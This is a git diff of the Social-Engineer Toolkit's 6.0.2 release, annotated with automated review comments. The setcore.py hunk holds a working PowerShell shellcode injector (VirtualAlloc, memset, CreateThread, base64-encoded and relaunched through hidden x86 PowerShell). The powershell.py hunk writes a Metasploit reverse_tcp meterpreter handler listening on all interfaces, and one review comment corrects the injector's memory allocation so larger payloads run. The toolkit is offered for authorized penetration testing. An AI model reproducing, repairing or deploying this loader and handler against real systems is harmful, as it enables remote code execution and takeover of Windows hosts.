diff --git a/README.md b/README.md index 927f3348e..819dd8334 100644 --- a/README.md +++ b/README.md @@ -5,8 +5,6 @@ Written by: David Kennedy (ReL1K) Company: [TrustedSec](https://www.trustedsec.com) -Development Team: Thomas Werth, Joey Furr (j0fer), JR DePre (pr1me) - DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes period. Please read the LICENSE under readme/LICENSE for the licensing of SET. @@ -23,5 +21,3 @@ For bug reports or enhancements, please open an issue here https://github.com/tr - Linux - Windows (experimental) - - diff --git a/readme/CHANGES b/readme/CHANGES index 19ea1e22b..6c7bbd90f 100644 --- a/readme/CHANGES +++ b/readme/CHANGES @@ -1,3 +1,17 @@ +~~~~~~~~~~~~~~~~ +version 6.0.2 +~~~~~~~~~~~~~~~~ + +* changed powershell injection technique to not exitonsession when creating the metasploit.rc file when specified in the powershell menu, this was already enabled when using psexec or other methods +* shrunk the powershell injection code command, not as much length needed - useful for shorter payloads +* slimmed down actual encoded powershell injection code, removed un-used code from the central powershell routine +* fixed a few typos and alignment on licensing agreement within SET and minor silly modifications to license +* fixed coloring when exiting and alignment for purpose of good disclaimer +* added print_status to bleeding edge tracking +* fixed unresponsive powershell injection when uses windows 8 +* changed java applet user agent string inside applet to evade java blockers +* removed old ID and value parameters from the Java Applet database, no longer used based on changes through Java 7 update 42 - SET now uses manifest files + ~~~~~~~~~~~~~~~~ version 6.0.1 ~~~~~~~~~~~~~~~~ diff --git a/readme/CREDITS b/readme/CREDITS index 0244aaf86..d28b9c7e1 100644 --- a/readme/CREDITS +++ b/readme/CREDITS 
@@ -62,6 +62,9 @@ Special thanks to the following people who have contributed to SET: The Social-Engineer Development Team: Dave Kennedy (ReL1K) + +Former Developers on SET: + JR DePre (pr1me) Thomas Werth Joey Furr (j0fer) diff --git a/readme/LICENSE b/readme/LICENSE index c6c33879c..1b2a3bf35 100644 --- a/readme/LICENSE +++ b/readme/LICENSE 
@@ -1,27 +1,17 @@ -Copyright 2013, The Social-Engineer Toolkit (SET) by TrustedSec, LLC +Copyright 2014, The Social-Engineer Toolkit (SET) by TrustedSec, LLC All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer - in the documentation and/or other materials provided with the distribution. - * Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from - this software without specific prior written permission. + * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. + * Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT -OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT -LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF -THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well. Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application. -Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit -is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever -see the creator of SET in a bar, you should give him a hug and buy him a beer. Hug must last at least 5 seconds. Author -holds the right to refuse the hug or the beer. 
+Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever see the creator of SET in a bar, you should give him a hug and buy him a beer. Hug must last at least 5 seconds. Author holds the right to refuse the hug (most likely will never happen) or the beer (also most likely will never happen). diff --git a/setoolkit b/setoolkit index b496e5d31..c7bba9d31 100755 --- a/setoolkit +++ b/setoolkit @@ -145,9 +145,7 @@ try: print line.rstrip() print bcolors.RED + """ -The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are -not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting -yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.""" + bcolors.GREEN +The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.""" + bcolors.GREEN choice = raw_input("\nDo you agree to the terms of service [y/n]: ") if choice == "yes" or choice == "y": filewrite = file("src/agreement4", "w") 
@@ -155,7 +153,7 @@ yes (only one time), you agree to the terms of service and that you will only us filewrite.close() print bcolors.ENDC else: - print "[!] Exiting the Social-Engineer Toolkit, have a nice day." + bcolors.ENDC + print bcolors.ENDC + "[!] Exiting the Social-Engineer Toolkit, have a nice day." + bcolors.ENDC sys.exit() while 1: diff --git a/src/core/setcore.py b/src/core/setcore.py index ebd594887..c95183826 100644 --- a/src/core/setcore.py +++ b/src/core/setcore.py @@ -24,6 +24,7 @@ try: from Crypto.Cipher import AES except ImportError: + print "[!] The python-pycrypto python module not installed. You will lose the ability for encrypted communications." pass @@ -229,7 +230,7 @@ def print_error(message): print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC def get_version(): - define_version = '6.0' + define_version = '6.0.2' return define_version class create_menu: @@ -277,11 +278,13 @@ def meta_path(): else: msf_path = msf_path + "/" trigger = 0 if not os.path.isdir(msf_path): + # specific for kali linux if os.path.isfile("/opt/metasploit/apps/pro/msf3/msfconsole"): msf_path = "/opt/metasploit/apps/pro/msf3/" trigger = 1 - # specific for backtrack5 + + # specific for backtrack5 and other backtrack versions if os.path.isfile("/opt/framework3/msf3/msfconsole"): msf_path = "/opt/framework3/msf3/" trigger = 1 @@ -294,6 +297,7 @@ def meta_path(): if os.path.isfile("/usr/bin/msfconsole"): msf_path = "" trigger = 1 + # specific for pwnpad and pwnplug (pwnie express) if os.path.isfile("/opt/metasploit-framework/msfconsole"): msf_path = "/opt/metasploit-framework" @@ -307,6 +311,8 @@ def meta_path(): print_error("Please configure in the config/set_config.") return_continue() return False + + # if we are using windows if check_os() == "windows": print_warning("Metasploit payloads are not currently supported. This is coming soon.") msf_path = "" 
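Review bot: The new ImportError message in the `from Crypto.Cipher import AES` guard leaves the `pass` below it redundant and does not record that AES is unavailable, so any later code path that calls `AES.new(...)` (not visible in this hunk) would presumably fail with a NameError instead of the graceful degradation the message promises. Suggest replacing the two lines with `print "[!] The python-pycrypto module is not installed; encrypted communications will be unavailable."` followed by `AES = None`, and having the AES users test `if AES is None` before use. The rewording also fixes the grammar of the current message. The surrounding `try` block begins outside this hunk.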
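Review bot: In meta_path the `/usr/bin/msfconsole` branch assigns `msf_path = ""` from a plain `if`, and every branch in this chain overwrites the previous result unconditionally, so on a host where an earlier check already found a real install (for example `/opt/metasploit/apps/pro/msf3/`) the later empty string wins and only the `/opt/metasploit-framework` check after it can override it again. Turning the chain into `elif`s, or returning as soon as `trigger` is set, would keep the first match. Note also that `/opt/metasploit-framework` is the one path stored without the trailing slash the other branches add, so a caller that concatenates `msf_path + "msfconsole"` would get a wrong path, whereas the `"%s/msfconsole"` format used in powershell.py tolerates both. meta_path starts and ends outside this hunk.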
@@ -425,6 +431,8 @@ def bleeding_edge(): print_status("Bleeding edge already active..Moving on..") subprocess.Popen("apt-get update;apt-get upgrade -f -y --force-yes;apt-get dist-upgrade -f -y --force-yes;apt-get autoremove -f -y --force-yes", shell=True).wait() return True + + # else lets add them if they want else: print_status("Adding Kali bleeding edge to sources.list for updates.") # we need to add repo to kali file @@ -451,6 +459,7 @@ def update_set(): time.sleep(2) bleeding_edge() + # if we aren't running Kali :( else: peinr_info("Kali-Linux not detected, manually updating..") print_info("Updating the Social-Engineer Toolkit, be patient...") @@ -792,7 +801,7 @@ def show_banner(define_version,graphic): print bcolors.BLUE + """ [---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---] [---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---] -[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---] +[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---] [---] Codename: '""" + bcolors.YELLOW + """Rebellion""" + bcolors.BLUE + """' [---] [---] Follow us on Twitter: """ + bcolors.PURPLE+ """@TrustedSec""" + bcolors.BLUE+""" [---] [---] Follow me on Twitter: """ + bcolors.PURPLE+ """@HackingDave""" + bcolors.BLUE+""" [---] 
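Review bot: The apt-get command in this branch of bleeding_edge runs `upgrade`, `dist-upgrade` and `autoremove` with `--force-yes`, which apt's own documentation calls dangerous and which on the apt releases of that era also lets unauthenticated packages through, so a root-level updater becomes a supply-chain hole for anyone who can tamper with the mirror or the connection (the `repo.kali.org` source this file adds is plain `http://`). Keep `-y` and drop `--force-yes`, e.g. `"apt-get update;apt-get upgrade -y;apt-get dist-upgrade -y;apt-get autoremove -y"`, so a signature failure aborts the update rather than being waved through. The hunk only adds a comment; the rest of the function lies outside it.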
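Review bot: The non-Kali branch of update_set calls `peinr_info(...)`, which looks like a typo for `print_info` and, unless a function of that name is defined elsewhere in the file, raises NameError the moment a non-Kali user tries to update. Change it to `print_info("Kali-Linux not detected, manually updating..")`. The rest of update_set lies outside this hunk.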
@@ -1245,8 +1254,10 @@ def generate_powershell_alphanumeric_payload(payload,ipaddr,port, payload2): # heres our shellcode prepped and ready to go shellcode = newdata[:-1] + # powershell command here, needs to be unicoded then base64 in order to use encodedcommand - this incorporates a new process downgrade attack where if it detects 64 bit it'll use x86 powershell. This is useful so we don't have to guess if its x64 or x86 and what type of shellcode to use - powershell_command = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = %s;$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";$cmd = "-nop -noni -enc ";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}""" % (shellcode)) + powershell_command = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr 
lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = %s;$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";$cmd = "-nop -noni -enc ";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}""" % (shellcode)) + # unicode and base64 encode and return it return base64.b64encode(powershell_command.encode('utf_16_le')) @@ -1261,7 +1272,6 @@ def generate_shellcode(payload,ipaddr,port): repls = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'unsigned char buf=' : '', 'unsignedcharbuf[]=' : ''} data = reduce(lambda a, kv: a.replace(*kv), repls.iteritems(), data).rstrip() # return data - print data return data # this will take input for shellcode and do a replace for IP addresses 
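Review bot: The `VirtualAlloc(0,0x1000,$size,0x40)` call in the generated PowerShell has its arguments in the wrong order: `dwSize` is pinned to 0x1000 and the computed `$size` lands in `flAllocationType`, so a payload larger than 4096 bytes is copied by the `memset` loop past a 4 KiB allocation, and for such payloads the flag value (`$size`, e.g. 0x1200) is unlikely to be a valid MEM_* combination at all. It should read `$x=$w::VirtualAlloc(0,$size,0x3000,0x40);` (MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE), which also makes the preceding `$size` computation meaningful. The CHANGES entry says this command was shrunk, but the visible old and new lines differ only in line wrapping, so the intended change may not have landed. generate_powershell_alphanumeric_payload starts outside this hunk.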
@@ -1602,18 +1612,18 @@ def bleeding_edge(): # first check if we are actually using Kali kali = check_kali() if kali == "Kali": - print "[*] Checking to see if bleeding-edge repos are active." + print_status("Checking to see if bleeding-edge repos are active.") # check if we have the repos enabled first fileopen = file("/etc/apt/sources.list", "r") kalidata = fileopen.read() if "deb http://repo.kali.org/kali kali-bleeding-edge main" in kalidata: - print "[*] Bleeding edge already active..Moving on.." + print_status("Bleeding edge already active..Moving on..") return True else: - print "[!] Bleeding edge repos were not detected. This is recommended." + print_warning("Bleeding edge repos were not detected. This is recommended.") enable = raw_input("Do you want to enable bleeding-edge repos for fast updates [yes/no]: ") if enable == "y" or enable == "yes": - print "[*] Adding Kali bleeding edge to sources.list for updates." + print_status("Adding Kali bleeding edge to sources.list for updates.") # we need to add repo to kali file # we will rewrite the entire apt in case not all repos are there filewrite = file("/etc/apt/sources.list", "w") diff --git a/src/fasttrack/mssql.py b/src/fasttrack/mssql.py index 8816f0268..74373902d 100644 --- a/src/fasttrack/mssql.py +++ b/src/fasttrack/mssql.py @@ -183,7 +183,7 @@ def deploy_hex2binary(ipaddr,port,username,password): x86 = file(setdir + "/x86.powershell", "r") x86 = x86.read() - x86 = "powershell -nop -win hidden -noni -enc " + x86 + x86 = "powershell -nop -win hid -noni -enc " + x86 print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir)) filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite.write(x86) diff --git a/src/fasttrack/psexec.py b/src/fasttrack/psexec.py index ce466320d..5416dff6b 100644 --- a/src/fasttrack/psexec.py +++ b/src/fasttrack/psexec.py 
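Review bot: This is the second `def bleeding_edge()` in setcore.py — the hunk headed `@@ -425,6 +431,8 @@` earlier in this diff shows another function with the same name — so whichever is defined later silently replaces the other at import time and update_set can only ever reach one of them. Merge the two (this one prompts before editing sources.list, the other runs the apt-get upgrade) or give them distinct names. Separately, `fileopen = file("/etc/apt/sources.list", "r")` is never closed, and the comment in the `else` branch says the whole of `/etc/apt/sources.list` is rewritten, which would discard any repositories the user added; appending a single `deb` line would be less destructive. The function continues past this hunk.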
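Review bot: The launcher prefix `"powershell -nop -win hid -noni -enc "` is edited by hand in three files in this commit (mssql.py, psexec.py and powershell.py), which is how the three had drifted to `-win hidden`, `-window hidden` and `-windows hidden` before it; a single constant or helper in setcore would keep them in step. The abbreviated switches rely on PowerShell's unambiguous-prefix matching, so a short comment such as `# -win hid == -WindowStyle Hidden; abbreviated to keep the command line short` would save the next reader a lookup. The `x86 = file(...)` handle opened two lines above is never closed; a `with` block would cover it. deploy_hex2binary starts and ends outside this hunk.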
@@ -64,7 +64,7 @@ try: x86 = file(setdir + "/x86.powershell", "r") x86 = x86.read() - x86 = "powershell -nop -window hidden -noni -enc " + x86 + x86 = "powershell -nop -win hid -noni -enc " + x86 print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir)) filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite.write(x86) diff --git a/src/powershell/powershell.py b/src/powershell/powershell.py index 3b98acd27..333b307d7 100644 --- a/src/powershell/powershell.py +++ b/src/powershell/powershell.py @@ -40,7 +40,7 @@ if powershell_menu_choice != "99": # here we format everything for us x86 = file(setdir + "/x86.powershell", "r") x86 = x86.read() - x86 = "powershell -nop -windows hidden -noni -enc " + x86 + x86 = "powershell -nop -win hid -noni -enc " + x86 print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir)) filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite.write(x86) @@ -53,7 +53,7 @@ if powershell_menu_choice != "99": # if we want to start the listener if choice == 'YES': filewrite = file(setdir + "/reports/powershell/powershell.rc", "w") - filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port)) + filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j" % (port)) filewrite.close() msf_path = meta_path() subprocess.Popen("ruby %s/msfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait() diff --git a/src/webattack/web_clone/applet.database b/src/webattack/web_clone/applet.database index 9bae17159..6ef10555e 100644 --- a/src/webattack/web_clone/applet.database +++ b/src/webattack/web_clone/applet.database @@ -1 +1 @@ - + 
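Review bot: The msfconsole launch a few lines below the changed rc write still interpolates `msf_path` and `setdir` into a `shell=True` string, so a path containing a space or shell metacharacter (both come from the operator's config, not the target) breaks the command, and when meta_path has set `msf_path` to the empty string (its `/usr/bin/msfconsole` branch in this diff) the format yields `ruby /msfconsole` unless code outside the visible hunks compensates. Passing an argument list, `subprocess.Popen(["ruby", msf_path + "/msfconsole", "-L", "-r", setdir + "/reports/powershell/powershell.rc"]).wait()`, removes the quoting problem; the empty-path case still needs handling in meta_path. The new `set ExitOnSession false` together with the existing `set LHOST 0.0.0.0` keeps a handler listening on every interface for the life of the console, which is what the CHANGES entry asks for but is worth stating in a comment above the write. The enclosing `if choice == 'YES'` block starts outside this hunk.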
diff --git a/src/webattack/web_clone/applet.database.old b/src/webattack/web_clone/applet.database.old index aabc2b852..9bae17159 100644 --- a/src/webattack/web_clone/applet.database.old +++ b/src/webattack/web_clone/applet.database.old @@ -1 +1 @@ - +